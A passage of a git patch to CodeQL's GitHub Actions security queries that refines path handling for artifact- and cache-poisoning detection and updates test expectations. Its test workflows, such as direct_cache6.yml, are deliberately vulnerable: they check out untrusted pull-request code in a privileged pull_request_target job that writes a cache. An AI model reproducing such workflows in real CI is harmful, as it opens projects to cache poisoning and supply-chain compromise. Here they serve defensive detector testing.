+| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -45,5 +51,8 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 006f365ae05..9358d65e8f4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,12 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | @@ -35,6 +41,18 @@ edges | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 9d26a8da26db1ed4c21939f4c4442ab319108a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:22:35 +0200 Subject: [PATCH 0545/1267] Improve path checks for Artifact and Cache poisoning queries --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/Helper.qll | 27 +++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++++ .../security/ArtifactPoisoningQuery.qll | 70 ++++++++++--------- .../actions/security/CachePoisoningQuery.qll | 10 ++- .../actions/security/PoisonableSteps.qll | 10 +-- .../security/UntrustedCheckoutQuery.qll | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 25 +------ .../.github/workflows/direct_cache6.yml | 15 +--- .../.github/workflows/neg_direct_cache4.yml | 23 ++++++ .../.github/workflows/neg_direct_cache5.yml | 23 ++++++ .../CachePoisoningViaDirectCache.expected | 14 ++-- .../CachePoisoningViaPoisonableStep.expected | 12 ++-- 13 files changed, 163 insertions(+), 98 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a1651eedc47..17b0dab4ee6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -289,6 +289,8 @@ class Run extends Step instanceof RunImpl { ScalarValue getScriptScalar() { result = super.getScriptScalar() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } + + string getWorkingDirectory() { result = super.getWorkingDirectory() } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9356950f571..f9fa108ec3a 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -283,3 +283,30 @@ string getRepoRoot() { result = "" ) } + +bindingset[path] +string normalizePath(string path) { + exists(string trimmed_path | trimmed_path = trimQuotes(path) | + // ./foo -> GITHUB_WORKSPACE/foo + if path.indexOf("./") = 0 + then result = path.replaceAll("./", "GITHUB_WORKSPACE/") + else + // GITHUB_WORKSPACE/foo -> GITHUB_WORKSPACE/foo + if path.indexOf("GITHUB_WORKSPACE/") = 0 + then result = path + else + // foo -> GITHUB_WORKSPACE/foo + if path.regexpMatch("^[^/~].*") + then result = "GITHUB_WORKSPACE/" + path.regexpReplaceAll("/$", "") + else + // ~/foo -> ~/foo + // /foo -> /foo + result = path + ) +} + +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[subpath, path] +predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 154d466ab7d..5361943331b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1317,6 +1317,18 @@ class RunImpl extends StepImpl { override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } + + /** Gets the working directory for this `runs` mapping. */ + string getWorkingDirectory() { + if exists(n.lookup("working-directory").(YamlString).getValue()) + then + result = + n.lookup("working-directory") + .(YamlString) + .getValue() + .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") + else result = "GITHUB_WORKSPACE/" + } } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 236cc4d8091..ebe22140be2 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -35,7 +35,9 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us } override string getPath() { - if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + if exists(this.getArgument("path")) + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/" } } @@ -79,11 +81,11 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep override string getPath() { if exists(this.getArgument(["path", "download_path"])) - then result = this.getArgument(["path", "download_path"]) + then result = normalizePath(this.getArgument(["path", "download_path"])) else if exists(this.getArgument("paths")) - then result = this.getArgument("paths").splitAt(" ") - else result = "" + then result = normalizePath(this.getArgument("paths").splitAt(" ")) + else result = "GITHUB_WORKSPACE/" } } @@ -114,8 +116,8 @@ class LegitLabsDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, override string getPath() { if exists(this.getArgument("path")) - then result = this.getArgument("path") - else result = "./artifacts" + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/artifacts" } } @@ -161,14 +163,14 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } @@ -197,18 +199,20 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } @@ -244,14 +248,16 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) - else result = "" + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + else result = "GITHUB_WORKSPACE/" } } @@ -268,18 +274,16 @@ class ArtifactPoisoningSink extends DataFlow::Node { ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), download.getPath()) + or // Checking the path for non local script execution steps is very difficult not poisonable instanceof LocalScriptExecutionRunStep - or - // TODO: account for Run's working directory - poisonable - .(LocalScriptExecutionRunStep) - .getCommand() - .matches(["./", ""] + download.getPath() + "%") + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), download.getPath()) ) or poisonable.(UsesStep) = this.asExpr() and - download.getPath() = "" + download.getPath() = "GITHUB_WORKSPACE/" ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 56002cb2b16..a0113beed46 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -51,13 +51,17 @@ abstract class CacheWritingStep extends Step { class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -66,5 +70,5 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getArgument("bundler-cache") = "true" } - override string getPath() { result = "vendor/bundle" } + override string getPath() { result = normalizePath("vendor/bundle") } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 5dd0081f61e..67bbfa2a4fe 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -36,18 +36,18 @@ class JavascriptImportnUsesStep extends PoisonableStep, UsesStep { } class LocalScriptExecutionRunStep extends PoisonableStep, Run { - string cmd; + string path; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int command_group | + exists(string line, string regexp, int path_group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, command_group) and - cmd = line.regexpCapture(regexp, command_group) + poisonableLocalScriptsDataModel(regexp, path_group) and + path = line.regexpCapture(regexp, path_group) ) } - string getCommand() { result = cmd } + string getPath() { result = normalizePath(path.splitAt(" ")) } } class LocalActionUsesStep extends PoisonableStep, UsesStep { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index df3e1e4d8a2..100a9c5dd5d 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -151,12 +151,6 @@ predicate containsHeadRef(string s) { ) } -private string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" -} - /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); @@ -208,7 +202,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } @@ -252,7 +246,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { override string getPath() { if exists(this.(UsesStep).getArgument("path")) then result = this.(UsesStep).getArgument("path") - else result = "?" + else result = "GITHUB_WORKSPACE/" } } @@ -277,7 +271,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using git within a Run step */ @@ -298,7 +292,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -321,7 +315,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ @@ -341,5 +335,5 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } - override string getPath() { result = getStepCWD() } + override string getPath() { result = this.(Run).getWorkingDirectory() } } diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index bda8224925e..91bb4d3bc5a 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -18,29 +18,6 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -/** - * Holds if the path cache_path is a subpath of the path untrusted_path. - */ -bindingset[cache_path, untrusted_path] -predicate controlledCachePath(string cache_path, string untrusted_path) { - exists(string normalized_cache_path, string normalized_untrusted_path | - ( - cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") - or - normalized_cache_path = cache_path.regexpReplaceAll("/$", "") - ) and - ( - untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") - or - normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") - ) and - normalized_cache_path.substring(0, normalized_untrusted_path.length()) = - normalized_untrusted_path - ) -} - query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob job, Event event, Step source, Step step, string message, string path @@ -86,7 +63,7 @@ where step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) + not path = "?" and isSubpath(step.(CacheWritingStep).getPath(), path) ) and not step instanceof PoisonableStep select step, source, step, diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index 5948474d21a..b9652d46b59 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -1,7 +1,7 @@ name: Test on: - issue_comment: + pull_request_target: permissions: actions: write @@ -11,6 +11,8 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} - name: Set up Python 3.10 uses: actions/setup-python@v5 with: @@ -22,14 +24,3 @@ jobs: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} restore-keys: ${{ runner.os }}-pip- - - name: Download artifact - uses: dawidd6/action-download-artifact@v2 - with: - name: results - path: results/ - - name: Upload results - uses: actions/upload-artifact@v4 - with: - name: results - path: results/ - if-no-files-found: ignore diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml new file mode 100644 index 00000000000..9afe62d69da --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ~/.grade/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml new file mode 100644 index 00000000000..b39bc7a880f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: /tmp/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 8bd69d8f245..f45755adf1d 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | @@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | @@ -45,4 +49,4 @@ edges | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index a515bd87334..cc5ce9bdf87 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | 